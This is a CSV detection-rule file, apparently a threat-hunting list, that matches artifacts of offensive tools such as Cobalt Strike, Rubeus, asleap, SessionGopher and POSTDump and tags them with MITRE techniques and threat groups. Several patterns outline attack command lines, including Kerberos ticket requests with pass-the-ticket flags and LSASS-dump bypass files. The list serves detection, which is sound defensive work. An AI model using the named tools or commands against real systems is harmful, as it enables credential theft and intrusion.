"*artifact64.x64.dll*",".{0,1000}artifact64\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34099"
"*artifact64big.exe*",".{0,1000}artifact64big\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34100"
"*artifact64big.x64.dll*",".{0,1000}artifact64big\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34101"
"*artifact64svc.exe*",".{0,1000}artifact64svc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34102"
"*artifact64svcbig.exe*",".{0,1000}artifact64svcbig\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34103"
"*artifactbig64.exe*",".{0,1000}artifactbig64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34104"
"*artifactuac*.dll*",".{0,1000}artifactuac.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34105"
"*artofpwn.com*",".{0,1000}artofpwn\.com.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#email","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","34106"
"*aruba2john.py*",".{0,1000}aruba2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","34107"
"*Arvanaghi/SessionGopher*",".{0,1000}Arvanaghi\/SessionGopher.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","34108"
"*arvato@atomsilo.com*",".{0,1000}arvato\@atomsilo\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34109"
"*AS 'Login that can be impersonated'*",".{0,1000}AS\s\'Login\sthat\scan\sbe\simpersonated\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","34110"
"*as 'Owner that can be impersonated'*",".{0,1000}as\s\'Owner\sthat\scan\sbe\simpersonated\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","34111"
"*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","34113"
"*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","34114"
"*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","34115"
"*asgardmaster5@protonmail.com*",".{0,1000}asgardmaster5\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34116"
"*Ashley.Mowat@protonmail.com*",".{0,1000}Ashley\.Mowat\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34117"
"*Ask to take over RDP session if another used is logged in (workstation)*",".{0,1000}Ask\sto\stake\sover\sRDP\ssession\sif\sanother\sused\sis\slogged\sin\s\(workstation\).{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","34118"
"*asktgs.x64.o*",".{0,1000}asktgs\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","34119"
"*asktgt /user* /domain:* /password:* /opsec /force /ptt*",".{0,1000}asktgt\s\/user.{0,1000}\s\/domain\:.{0,1000}\s\/password\:.{0,1000}\s\/opsec\s\/force\s\/ptt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","34120"
"*asleap -C * -R *",".{0,1000}asleap\s\-C\s.{0,1000}\s\-R\s.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","0","N/A","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","34121"
"*asleap -r *.dump *",".{0,1000}asleap\s\-r\s.{0,1000}\.dump\s.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","0","N/A","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","34122"
"*asp-jinja-obfuscator.py*",".{0,1000}asp\-jinja\-obfuscator\.py.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","34123"
"*ASR_bypass_to_dump_LSASS.cs*",".{0,1000}ASR_bypass_to_dump_LSASS\.cs.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","34124"
"*ASRenum-BOF.*",".{0,1000}ASRenum\-BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","N/A","10","10","153","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z","34125"
"*asrep_attack*",".{0,1000}asrep_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","34126"
"*asrep2kirbi*",".{0,1000}asrep2kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","34127"
"*asreprc4_attack*",".{0,1000}asreprc4_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","34128"
"*asreproast /*",".{0,1000}asreproast\s\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","34129"
"*asreproast(*",".{0,1000}asreproast\(.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","34130"
"*Asreproast.*",".{0,1000}Asreproast\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","34131"
"*ASREPRoast.ps1*",".{0,1000}ASREPRoast\.ps1.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","N/A","3","202","58","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z","34132"
